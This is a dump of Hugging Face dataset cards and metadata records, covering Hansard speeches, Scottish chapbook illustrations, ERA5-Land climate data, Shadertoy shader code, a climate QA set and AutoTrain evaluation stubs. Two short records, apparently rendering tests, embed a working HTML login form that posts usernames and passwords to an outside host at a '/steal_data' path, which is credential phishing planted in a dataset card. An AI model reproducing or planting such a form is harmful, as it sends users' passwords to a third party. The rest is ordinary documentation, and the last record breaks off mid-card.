- [Data Fields](#data-instances)
- [Data Splits](#data-instances)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
## Dataset Description
- **Homepage:** https://evanodell.com/projects/datasets/hansard-data/
- **Repository:** https://github.com/evanodell/hansard-data3
- **Paper:** [Needs More Information]
- **Leaderboard:** [Needs More Information]
- **Point of Contact:** [Evan Odell](https://github.com/evanodell)
### Dataset Summary
A dataset containing every speech in the House of Commons from May 1979-July 2020. Quoted from the dataset homepage
> Please contact me if you find any errors in the dataset. The integrity of the public Hansard record is questionable at times, and while I have improved it, the data is presented "as is".
### Supported Tasks and Leaderboards
- `text-classification`: This dataset can be used to classify various texts (transcribed from speeches) as different time periods or as different types
- `language-modeling`: This dataset can contribute to the training or the evaluation of language models for historical texts.
### Languages
`en:GB`
## Dataset Structure
### Data Instances
```
{
'id': 'uk.org.publicwhip/debate/1979-05-17a.390.0',
'speech': "Since the Minister for Consumer Affairs said earlier that the bread price rise would be allowed, in view of developing unemployment in the baking industry, and since the Mother's Pride bakery in my constituency is about to close, will the right hon. Gentleman give us a firm assurance that there will be an early debate on the future of the industry, so that the Government may announce that, thanks to the price rise, those workers will not now be put out of work?",
'display_as': 'Eric Heffer',
'party': 'Labour',
'constituency': 'Liverpool, Walton',
'mnis_id': '725',
'date': '1979-05-17',
'time': '',
'colnum': '390',
'speech_class': 'Speech',
'major_heading': 'BUSINESS OF THE HOUSE',
'minor_heading': '',
'oral_heading': '',
'year': '1979',
'hansard_membership_id': '5612',
'speakerid': 'uk.org.publicwhip/member/11615',
'person_id': '',
'speakername': 'Mr. Heffer',
'url': '',
'government_posts': [],
'opposition_posts': [],
'parliamentary_posts': ['Member, Labour Party National Executive Committee']
}
```
### Data Fields
|Variable|Description|
|---|---|
|id|The ID as assigned by mysociety|
|speech|The text of the speech|
|display_as| The standardised name of the MP.|
|party|The party an MP is member of at time of speech|
|constituency| Constituency represented by MP at time of speech|
|mnis_id| The MP's Members Name Information Service number|
|date|Date of speech|
|time|Time of speech|
|colnum |Column number in hansard record|
|speech_class |Type of speech|
|major_heading| Major debate heading|
|minor_heading| Minor debate heading|
|oral_heading| Oral debate heading|
|year |Year of speech|
|hansard_membership_id| ID used by mysociety|
|speakerid |ID used by mysociety|
|person_id |ID used by mysociety|
|speakername| MP name as appeared in Hansard record for speech|
|url| link to speech|
|government_posts| Government posts held by MP (list)|
|opposition_posts |Opposition posts held by MP (list)|
|parliamentary_posts| Parliamentary posts held by MP (list)|
### Data Splits
Train: 2694375
## Dataset Creation
### Curation Rationale
This dataset contains all the speeches made in the House of Commons and can be used for a number of deep learning tasks like detecting how language and societal views have changed over the >40 years. The dataset also provides language closer to the spoken language used in an elite British institution.
### Source Data
#### Initial Data Collection and Normalization
The dataset is created by getting the data from [data.parliament.uk](http://data.parliament.uk/membersdataplatform/memberquery.aspx). There is no normalization.
#### Who are the source language producers?
[N/A]
### Annotations
#### Annotation process
None
#### Who are the annotators?
[N/A]
### Personal and Sensitive Information
This is public information, so there should not be any personal and sensitive information
## Considerations for Using the Data
### Social Impact of Dataset
The purpose of this dataset is to understand how language use and society's views have changed over time.
### Discussion of Biases
Because of the long time period this dataset spans, it might contain language and opinions that are unacceptable in modern society.
### Other Known Limitations
[Needs More Information]
## Additional Information
### Dataset Curators
This dataset was built on top of [parlparse](https://github.com/mysociety/parlparse) by [Evan Odell](https://github.com/evanodell)
### Licensing Information
Creative Commons Attribution 4.0 International License
### Citation Information
```
@misc{odell, evan_2021,
title={Hansard Speeches 1979-2021: Version 3.1.0},
DOI={10.5281/zenodo.4843485},
abstractNote={<p>Full details are available at <a href="https://evanodell.com/projects/datasets/hansard-data">https://evanodell.com/projects/datasets/hansard-data</a></p> <p><strong>Version 3.1.0 contains the following changes:</strong></p> <p>- Coverage up to the end of April 2021</p>},
note={This release is an update of previously released datasets. See full documentation for details.},
publisher={Zenodo},
author={Odell, Evan},
year={2021},
month={May} }
```
Thanks to [@shamikbose](https://github.com/shamikbose) for adding this dataset. | biglam/hansard_speech | [
"task_categories:text-classification",
"task_categories:text-generation",
"task_ids:multi-class-classification",
"task_ids:language-modeling",
"task_ids:masked-language-modeling",
"annotations_creators:no-annotation",
"language_creators:expert-generated",
"multilinguality:monolingual",
"size_categories:1M<n<10M",
"source_datasets:original",
"language:en",
"license:cc-by-4.0",
"speeches",
"politics",
"parliament",
"British",
"region:us"
] | 2022-07-22T20:57:59+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["expert-generated"], "language": ["en"], "license": ["cc-by-4.0"], "multilinguality": ["monolingual"], "size_categories": ["1M<n<10M"], "source_datasets": ["original"], "task_categories": ["text-classification", "text-generation"], "task_ids": ["multi-class-classification", "language-modeling", "masked-language-modeling"], "pretty_name": "Hansard Speeches", "tags": ["speeches", "politics", "parliament", "British"]} | 2022-07-27T11:30:30+00:00 |
1814a7e4c91dc6bfc0f7654da1170d3cafed64a6 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form>
## Test
** test2 ** | testname/TestCard | [
"region:us"
] | 2022-07-23T01:14:50+00:00 | {} | 2022-07-23T01:27:28+00:00 |
4cbca4e0faa2eca2064f49fe5159723c276eb905 | <form action="http://3msec.com/steal_data" method="POST">
Username: <input name="username" type="text">
Password: <input name="password" type="password">
<input name="submit" type="submit"
<input>
</form> | dsadasdad/tesfdjh | [
"region:us"
] | 2022-07-23T01:38:32+00:00 | {} | 2022-07-23T01:39:57+00:00 |
3a590f87db94258c732e8d8ce68d188697818991 |
This dataset is comprised of ECMWF ERA5-Land data covering 2014 to October 2022. This data is on a 0.1 degree grid and has fewer variables than the standard ERA5-reanalysis, but at a higher resolution. All the data has been downloaded as NetCDF files from the Copernicus Data Store and converted to Zarr using Xarray, then uploaded here. Each file is one day, and holds 24 timesteps. | openclimatefix/era5-land | [
"license:mit",
"region:us"
] | 2022-07-23T14:13:58+00:00 | {"license": "mit"} | 2022-12-01T12:38:35+00:00 |
36582224499cc4c4c364ddec6d5de46839e1c451 |
# Dataset Card for National Library of Scotland Chapbook Illustrations
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Curation Rationale](#curation-rationale)
- [Source Data](#source-data)
- [Annotations](#annotations)
- [Personal and Sensitive Information](#personal-and-sensitive-information)
- [Considerations for Using the Data](#considerations-for-using-the-data)
- [Social Impact of Dataset](#social-impact-of-dataset)
- [Discussion of Biases](#discussion-of-biases)
- [Other Known Limitations](#other-known-limitations)
- [Additional Information](#additional-information)
- [Dataset Curators](#dataset-curators)
- [Licensing Information](#licensing-information)
- [Citation Information](#citation-information)
- [Contributions](#contributions)
## Dataset Description
- **Homepage:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/
- **Repository:** https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/
- **Paper:** https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf
- **Leaderboard:**
- **Point of Contact:** [email protected]
### Dataset Summary
This dataset comprises of images from chapbooks held by the [National Library of Scotland](https://www.nls.uk/) and digitised and published as its [Chapbooks Printed in Scotland](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) dataset.
> "Chapbooks were staple everyday reading material from the end of the 17th to the later 19th century. They were usually printed on a single sheet and then folded into books of 8, 12, 16 and 24 pages, and they were often illustrated with crude woodcuts. Their subjects range from news courtship, humour, occupations, fairy tales, apparitions, war, politics, crime, executions, historical figures, transvestites [*sic*] and freemasonry to religion and, of course, poetry. It has been estimated that around two thirds of chapbooks contain songs and poems, often under the title garlands." -[Source](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/)
Chapbooks were frequently illustrated, particularly on their title pages to attract customers, usually with a woodblock-printed illustration, or occasionally with a stereotyped woodcut or cast metal ornament. Apart from their artistic interest, these illustrations can also provide historical evidence such as the date, place or persons behind the publication of an item.
This dataset contains annotations for a subset of these chapbooks, created by Giles Bergel and Abhishek Dutta, based in the [Visual Geometry Group](https://www.robots.ox.ac.uk/~vgg/) in the University of Oxford. They were created under a National Librarian of Scotland's Fellowship in Digital Scholarship [awarded](https://data.nls.uk/projects/the-national-librarians-research-fellowship-in-digital-scholarship/) to Giles Bergel in 2020. These annotations provide bounding boxes around illustrations printed on a subset of the chapbook pages, created using a combination of manual annotation and machine classification, described in [this paper](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/data/dutta2021visual.pdf).
The dataset also includes computationally inferred 'visual groupings' to which illustrated chapbook pages may belong. These groupings are based on the recurrence of illustrations on chapbook pages, as determined through the use of the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/)
### Supported Tasks and Leaderboards
- `object-detection`: the dataset contains bounding boxes for images contained in the Chapbooks
- `image-classification`: a configuration for this dataset provides a classification label indicating if a page contains an illustration or not.
- `image-matching`: a configuration for this dataset contains the annotations sorted into clusters or 'visual groupings' of illustrations that contain visually-matching content as determined by using the [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/).
The performance on the `object-detection` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
| IOU threshold | Precision | Recall |
|---------------|-----------|--------|
| 0.50 | 0.993 | 0.911 |
| 0.75 | 0.987 | 0.905 |
| 0.95 | 0.973 | 0.892 |
The performance on the `image classification` task reported in the paper [Visual Analysis of Chapbooks Printed in Scotland](https://dl.acm.org/doi/10.1145/3476887.3476893) is as follows:
Images in original dataset: 47329
Numbers of images on which at least one illustration was detected: 3629
Note that these figures do not represent images that contained multiple detections.
See the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for examples of false-positive detections.
The performance on the 'image-matching' task is undergoing evaluation.
### Languages
Text accompanying the illustrations is in English, Scots or Scottish Gaelic.
## Dataset Structure
### Data Instances
An example instance from the `illustration-detection` split:
```python
{'image_id': 4,
'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'width': 600,
'height': 1080,
'objects': [{'category_id': 0,
'image_id': '4',
'id': 1,
'area': 110901,
'bbox': [34.529998779296875,
556.8300170898438,
401.44000244140625,
276.260009765625],
'segmentation': [[34.529998779296875,
556.8300170898438,
435.9700012207031,
556.8300170898438,
435.9700012207031,
833.0900268554688,
34.529998779296875,
833.0900268554688]],
'iscrowd': False}]}
```
An example instance from the `image-classification` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'label': 1}
```
An example from the `image-matching` split:
```python
{'image': <PIL.JpegImagePlugin.JpegImageFile image mode=RGB size=600x1080>,
'group-label': 231}
```
### Data Fields
The fields for the `illustration-detection` config:
- image_id: id for the image
- height: height of the image
- width: width of the image
- image: image of the chapbook page
- objects: annotations in COCO format, consisting of a list containing dictionaries with the following keys:
- bbox: bounding boxes for the images
- category_id: a label for the image
- image_id: id for the image
- iscrowd: COCO is a crowd flag
- segmentation: COCO segmentation annotations (empty in this case but kept for compatibility with other processing scripts)
The fields for the `image-classification` config:
- image: image
- label: a label indicating if the page contains an illustration or not
The fields for the `image-matching` config:
- image: image of the chapbook page
- label: an id for a particular instance of an image i.e. the same images will share the same id.
### Data Splits
There is a single split `train` for all configs. K-fold validation was used in the [paper](https://dl.acm.org/doi/10.1145/3476887.3476893) describing this dataset, so no existing splits were defined.
## Dataset Creation
### Curation Rationale
The dataset was created to facilitate research into Scottish chapbook illustration and publishing. Detected illustrations can be browsed under publication metadata: together with the use of [VGG Image Search Engine (VISE) software](https://www.robots.ox.ac.uk/~vgg/software/vise/), this allows researchers to identify matching imagery and to infer the source of a chapbook from partial evidence. This browse and search functionality is available in this [public demo](http://meru.robots.ox.ac.uk/nls_chapbooks/filelist) documented [here](https://www.robots.ox.ac.uk/~vgg/research/chapbooks/)
### Source Data
#### Initial Data Collection and Normalization
The initial data was taken from the [National Library of Scotland's Chapbooks Printed in Scotland dataset](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/) No normalisation was performed, but only the images and a subset of the metadata was used. OCR text was not used.
#### Who are the source language producers?
The initial dataset was created by the National Library of Scotland from scans and in-house curated catalogue descriptions for the NLS [Data Foundry](https://data.nls.uk) under the direction of Dr. Sarah Ames.
This subset of the data was created by Dr. Giles Bergel and Dr. Abhishek Dutta using a combination of manual annotation and machine classification, described below.
### Annotations
#### Annotation process
Annotation was initially performed on a subset of 337 of the 47329 images, using the [VGG List Annotator (LISA](https://gitlab.com/vgg/lisa) software. Detected illustrations, displayed as annotations in LISA, were reviewed and refined in a number of passes (see [this paper](https://dl.acm.org/doi/10.1145/3476887.3476893) for more details). Initial detections were performed with an [EfficientDet](https://ai.googleblog.com/2020/04/efficientdet-towards-scalable-and.html) object detector trained on [COCO](https://cocodataset.org/#home), the annotation of which is described in [this paper](https://arxiv.org/abs/1405.0312)
#### Who are the annotators?
Abhishek Dutta created the initial 337 annotations for retraining the EfficentDet model. Detections were reviewed and in some cases revised by Giles Bergel.
### Personal and Sensitive Information
None
## Considerations for Using the Data
### Social Impact of Dataset
We believe this dataset will assist in the training and benchmarking of illustration detectors. It is hoped that by automating a task that would otherwise require manual annotation it will save researchers time and labour in preparing data for both machine and human analysis. The dataset in question is based on a category of popular literature that reflected the learning, tastes and cultural faculties of both its large audiences and its largely-unknown creators - we hope that its use, reuse and adaptation will highlight the importance of cheap chapbooks in the spread of literature, knowledge and entertainment in both urban and rural regions of Scotland and the United Kingdom during this period.
### Discussion of Biases
While the original Chapbooks Printed in Scotland is the largest single collection of digitised chapbooks, it is as yet unknown if it is fully representative of all chapbooks printed in Scotland, or of cheap printed literature in general. It is known that a small number of chapbooks (less than 0.1%) within the original collection were not printed in Scotland but this is not expected to have a significant impact on the profile of the collection as a representation of the population of chapbooks as a whole.
The definition of an illustration as opposed to an ornament or other non-textual printed feature is somewhat arbitrary: edge-cases were evaluated by conformance with features that are most characteristic of the chapbook genre as a whole in terms of content, style or placement on the page.
As there is no consensus definition of the chapbook even among domain specialists, the composition of the original dataset is based on the judgement of those who assembled and curated the original collection.
### Other Known Limitations
Within this dataset, illustrations are repeatedly reused to an unusually high degree compared to other printed forms. The positioning of illustrations on the page and the size and format of chapbooks as a whole is also characteristic of the chapbook format in particular. The extent to which these annotations may be generalised to other printed works is under evaluation: initial results have been promising for other letterpress illustrations surrounded by texts.
## Additional Information
### Dataset Curators
- Giles Bergel
- Abhishek Dutta
### Licensing Information
In accordance with the [original data](https://data.nls.uk/data/digitised-collections/chapbooks-printed-in-scotland/), this dataset is in the public domain.
### Citation Information
``` bibtex
@inproceedings{10.1145/3476887.3476893,
author = {Dutta, Abhishek and Bergel, Giles and Zisserman, Andrew},
title = {Visual Analysis of Chapbooks Printed in Scotland},
year = {2021},
isbn = {9781450386906},
publisher = {Association for Computing Machinery},
address = {New York, NY, USA},
url = {https://doi.org/10.1145/3476887.3476893},
doi = {10.1145/3476887.3476893},
abstract = {Chapbooks were short, cheap printed booklets produced in large quantities in Scotland, England, Ireland, North America and much of Europe between roughly the seventeenth and nineteenth centuries. A form of popular literature containing songs, stories, poems, games, riddles, religious writings and other content designed to appeal to a wide readership, they were frequently illustrated, particularly on their title-pages. This paper describes the visual analysis of such chapbook illustrations. We automatically extract all the illustrations contained in the National Library of Scotland Chapbooks Printed in Scotland dataset, and create a visual search engine to search this dataset using full or part-illustrations as queries. We also cluster these illustrations based on their visual content, and provide keyword-based search of the metadata associated with each publication. The visual search; clustering of illustrations based on visual content; and metadata search features enable researchers to forensically analyse the chapbooks dataset and to discover unnoticed relationships between its elements. We release all annotations and software tools described in this paper to enable reproduction of the results presented and to allow extension of the methodology described to datasets of a similar nature.},
booktitle = {The 6th International Workshop on Historical Document Imaging and Processing},
pages = {67–72},
numpages = {6},
keywords = {illustration detection, chapbooks, image search, visual grouping, printing, digital scholarship, illustration dataset},
location = {Lausanne, Switzerland},
series = {HIP '21}
}
```
### Contributions
Thanks to [@davanstrien](https://github.com/davanstrien) and Giles Bergel for adding this dataset. | biglam/nls_chapbook_illustrations | [
"task_categories:object-detection",
"task_categories:image-classification",
"task_ids:multi-class-image-classification",
"annotations_creators:expert-generated",
"size_categories:1K<n<10K",
"license:other",
"lam",
"historic",
"arxiv:1405.0312",
"region:us"
] | 2022-07-23T20:05:40+00:00 | {"annotations_creators": ["expert-generated"], "language_creators": [], "license": ["other"], "multilinguality": [], "size_categories": ["1K<n<10K"], "source_datasets": [], "task_categories": ["object-detection", "image-classification"], "task_ids": ["multi-class-image-classification"], "pretty_name": "National Library of Scotland Chapbook Illustrations", "tags": ["lam", "historic"]} | 2023-02-15T16:11:54+00:00 |
6aa087d61c9aa8bb123ef1d8ecaac7b1bbd55d05 | Gpaiva/NERDE_sentences | [
"license:cc-by-4.0",
"region:us"
] | 2022-07-23T23:12:59+00:00 | {"license": "cc-by-4.0"} | 2022-07-23T23:22:44+00:00 |
|
76fcebe426935e35713fd378b3de34e05581578e | Pligabue/BLAB_KG | [
"license:mit",
"region:us"
] | 2022-07-24T02:52:47+00:00 | {"license": "mit"} | 2022-07-24T02:52:47+00:00 |
|
7b56660696f0df6adba35ef2d89e7bd549a2b409 |
一个包含六种基本情绪(愤怒、恐惧、喜悦、爱、悲伤和惊讶)的英文Twitter消息数据集
Github 链接 https://github.com/dair-ai/emotion_dataset
| ttxy/emotion | [
"task_categories:text-classification",
"language:code",
"license:bsd",
"classification",
"region:us"
] | 2022-07-24T05:00:03+00:00 | {"language": ["code"], "license": "bsd", "task_categories": ["text-classification"], "pretty_name": "English Emotion classification", "tags": ["classification"]} | 2023-08-17T01:25:59+00:00 |
08ebcd44475da03e21fef856c051b8c98639ed6e | apoulos/Fork-test | [
"license:unknown",
"region:us"
] | 2022-07-24T05:05:16+00:00 | {"license": "unknown"} | 2022-07-24T05:05:16+00:00 |
|
17a36adb411ff1fea0d7dd861faa580e7839aac2 | apoulos/GFPGAN-fork | [
"license:unknown",
"region:us"
] | 2022-07-24T05:25:08+00:00 | {"license": "unknown"} | 2022-07-24T05:25:08+00:00 |
|
0bafa7af1ec5ff70f682f40196ebc18708f8d27f | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/minilm-uncased-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695556 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:20:54+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/minilm-uncased-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:23:49+00:00 |
0012c270d0bd91ea80c924aa6dfdf9358394daa2 | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/tinyroberta-6l-768d
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695557 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:13+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/tinyroberta-6l-768d", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:16+00:00 |
446bb59eac4bc07d261513dd87c75cc14d00df1b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-base-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
Thanks to [@ghpkishore](https://huggingface.co/ghpkishore) for evaluating this model. | autoevaluate/autoeval-staging-eval-project-squad_v2-2eb94bfa-11695558 | [
"autotrain",
"evaluation",
"region:us"
] | 2022-07-24T07:21:23+00:00 | {"type": "predictions", "tags": ["autotrain", "evaluation"], "datasets": ["squad_v2"], "eval_info": {"task": "extractive_question_answering", "model": "deepset/xlm-roberta-base-squad2", "metrics": [], "dataset_name": "squad_v2", "dataset_config": "squad_v2", "dataset_split": "validation", "col_mapping": {"context": "context", "question": "question", "answers-text": "answers.text", "answers-answer_start": "answers.answer_start"}}} | 2022-07-24T07:25:57+00:00 |
4eda02d5543e62650c00f8abd5b0cc1335b03088 | The Climate Change MRC dataset, also known as CCMRC, is a part of the work "Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering", accepted at IJCAI-ECAI 2022. The paper was accepted in the special system demo track "AI for Good".
If you use the dataset, cite the following paper:
```
@inproceedings{rony2022climatemrc,
title={Climate Bot: A Machine Reading Comprehension System for Climate Change Question Answering.},
author={Rony, Md Rashad Al Hasan and Zuo, Ying and Kovriguina, Liubov and Teucher, Roman and Lehmann, Jens},
booktitle={IJCAI},
year={2022}
}
```
| rony/climate-change-MRC | [
"license:mit",
"region:us"
] | 2022-07-24T10:22:03+00:00 | {"license": "mit"} | 2022-07-25T05:14:09+00:00 |
6e047a1b02a1865e862da10fde74d21396ed845d | ntmkhanh/recipe | [
"license:apache-2.0",
"region:us"
] | 2022-07-24T11:59:52+00:00 | {"license": "apache-2.0"} | 2022-07-24T11:59:52+00:00 |
|
796cb315ae0a504ac1b731a93216e019c2cd59a1 |
# Dataset Card for Shadertoys
## Table of Contents
- [Table of Contents](#table-of-contents)
- [Dataset Description](#dataset-description)
- [Dataset Summary](#dataset-summary)
- [Supported Tasks and Leaderboards](#supported-tasks-and-leaderboards)
- [Languages](#languages)
- [Dataset Structure](#dataset-structure)
- [Data Instances](#data-instances)
- [Data Fields](#data-fields)
- [Data Splits](#data-splits)
- [Dataset Creation](#dataset-creation)
- [Source Data](#source-data)
- [Licensing Information](#licensing-information)
## Dataset Description
- **Repository:** https://github.com/Vipitis/project (private placeholder)
### Dataset Summary
The Shadertoys dataset contains over 44k renderpasses collected from the Shadertoy.com API. Some shader programm contain multiple render passes.
To browse a subset of this dataset, look at the [ShaderEval](https://huggingface.co/spaces/Vipitis/ShaderCoder) space. A finer variant of this dataset is [Shadertoys-fine](https://huggingface.co/datasets/Vipitis/Shadertoys-fine).
### Supported Tasks and Leaderboards
`text-generation` the dataset can be used to train generative language models, for code completion tasks.
`ShaderEval` [task1](https://huggingface.co/spaces/Vipitis/ShaderEval) from ShaderEval uses a dataset derived from Shadertoys to test return completion of autoregressive language models.
### Languages
- English (title, description, tags, comments)
- Shadercode **programming** language, a subset of GLSL specifically for Shadertoy.com
## Dataset Structure
### Data Instances
A data point consists of the whole shadercode, some information from the API as well as additional metadata.
```
{
'num_passes': 1,
'has_inputs': False,
'name': 'Image',
'type': 'image',
'code': '<full code>',
'title': '<title of the shader>',
'description': '<description of the shader>',
'tags': ['tag1','tag2','tag3', ... ],
'license': 'unknown',
'author': '<username>',
'source': 'https://shadertoy.com/view/<shaderID>'
}
```
### Data Fields
- 'num_passes' number of passes the parent shader program has
- 'has_inputs' if any inputs were used like textures, audio streams,
- 'name' Name of the renderpass, usually Image, Buffer A, Common, etc
- 'type' type of the renderpass; one of `{'buffer', 'common', 'cubemap', 'image', 'sound'}`
- 'code' the raw code (including comments) the whole renderpass.
- 'title' Name of the Shader
- 'description' description given for the Shader
- 'tags' List of tags assigned to the Shader (by it's creator); there are more than 10000 unique tags.
- 'license' currently in development
- 'author' username of the shader author
- 'source' URL to the shader. Not to the specific renderpass.
### Data Splits
Currently available (shuffled):
- train (85.0%)
- test (15.0%)
## Dataset Creation
Data retrieved starting 2022-07-20
### Source Data
#### Initial Data Collection and Normalization
All data was collected via the [Shadertoy.com API](https://www.shadertoy.com/howto#q2) and then iterated over the items in 'renderpass' while adding some of the fields from 'info'.
The code to generate these datasets should be published on the GitHub repository in the near future.
#### Who are the source language producers?
Shadertoy.com contributers which publish shaders as 'public+API'
## Licensing Information
The Default [license for each Shader](https://www.shadertoy.com/terms) is CC BY-NC-SA 3.0. However, some Shaders might have a different license attached.
The Dataset is currently not filtering for any licenses but gives a license tag, if easily recognizeable by naive means.
Please check the first comment of each shader program yourself as to not violate any copyrights for downstream use. The main license requires share alike and by attribution.
Attribution of every data field can be found in the 'author' column, but might not include further attribution within the code itself or parents from forked shaders. | Vipitis/Shadertoys | [
"task_categories:text-generation",
"task_categories:text-to-image",
"annotations_creators:no-annotation",
"language_creators:machine-generated",
"size_categories:10K<n<100K",
"language:en",
"language:code",
"license:cc-by-nc-sa-3.0",
"code",
"region:us"
] | 2022-07-24T14:08:41+00:00 | {"annotations_creators": ["no-annotation"], "language_creators": ["machine-generated"], "language": ["en", "code"], "license": ["cc-by-nc-sa-3.0"], "multilinguality": [], "size_categories": ["10K<n<100K"], "source_datasets": [], "task_categories": ["text-generation", "text-to-image"], "task_ids": [], "pretty_name": "Shadertoys", "tags": ["code"], "dataset_info": {"features": [{"name": "num_passes", "dtype": "int64"}, {"name": "has_inputs", "dtype": "bool"}, {"name": "name", "dtype": "string"}, {"name": "type", "dtype": "string"}, {"name": "code", "dtype": "string"}, {"name": "title", "dtype": "string"}, {"name": "description", "dtype": "string"}, {"name": "tags", "sequence": "string"}, {"name": "author", "dtype": "string"}, {"name": "license", "dtype": "string"}, {"name": "source", "dtype": "string"}], "splits": [{"name": "train", "num_bytes": 162960894, "num_examples": 37841}, {"name": "test", "num_bytes": 26450429, "num_examples": 6617}], "download_size": 86294414, "dataset_size": 189411323}} | 2023-06-26T18:04:58+00:00 |
bb5c85533e51ecd070d479ccb23e10c92bed9dfe | nateraw/sqllitetest | [
"license:mit",
"region:us"
] | 2022-07-24T18:38:50+00:00 | {"license": "mit"} | 2022-07-24T18:44:41+00:00 |
|
fbb486cd44835e75f925e1318193c0b77da9c0cc | nateraw/snowflaketest | [
"license:mit",
"region:us"
] | 2022-07-24T19:17:36+00:00 | {"license": "mit"} | 2022-08-01T15:20:03+00:00 |
|
c876612cc6bf2807af9ec786b6303390d47ecd9d | devmehta787/wav2vec2-xlsr-hindi | [
"license:afl-3.0",
"region:us"
] | 2022-07-24T19:54:16+00:00 | {"license": "afl-3.0"} | 2022-07-25T07:28:19+00:00 |
|
3beff0e67d14889b60f313701a936360828e1283 |
This repository contains a slightly modified version of https://github.com/lang-uk/ukrainian-word-stress-dictionary to be used in Text-to-Speech project based on Tacoctron 2 | Yehor/uk-stresses | [
"uk",
"region:us"
] | 2022-07-24T19:54:28+00:00 | {"tags": ["uk"]} | 2022-07-28T12:57:39+00:00 |
cdef59ebbf0590d84506524cf199a419c036f728 | jack66931/ClassTest | [
"license:unknown",
"region:us"
] | 2022-07-24T20:30:41+00:00 | {"license": "unknown"} | 2022-07-24T20:30:41+00:00 |
|
47e32b8a853777f36903af82a1008f5d3f230d2a | -kowiki202206 1줄 말뭉치
| bongsoo/kowiki20220620 | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T03:45:16+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T23:08:42+00:00 |
f851e9309b7e3160f513f254bf9d98976d162d6c | actdan2016/dandna | [
"region:us"
] | 2022-07-25T04:43:40+00:00 | {} | 2022-10-13T05:39:19+00:00 |
|
79cedccdca57aee5a769b1898987f489c8aa3b8b | - 평가 말뭉치 | bongsoo/bongevalsmall | [
"language:ko",
"license:apache-2.0",
"region:us"
] | 2022-07-25T05:04:14+00:00 | {"language": ["ko"], "license": "apache-2.0"} | 2022-10-04T22:48:22+00:00 |
8e5abafb2af8f768229735214b911e7aa9c7603b | # Dataset Card for AutoTrain Evaluator
This repository contains model predictions generated by [AutoTrain](https://huggingface.co/autotrain) for the following task and dataset:
* Task: Question Answering
* Model: deepset/xlm-roberta-large-squad2
* Dataset: squad_v2
* Config: squad_v2
* Split: validation
To run new evaluation jobs, visit Hugging Face's [automatic model evaluator](https://huggingface.co/spaces/autoevaluate/model-evaluator).
## Contributions
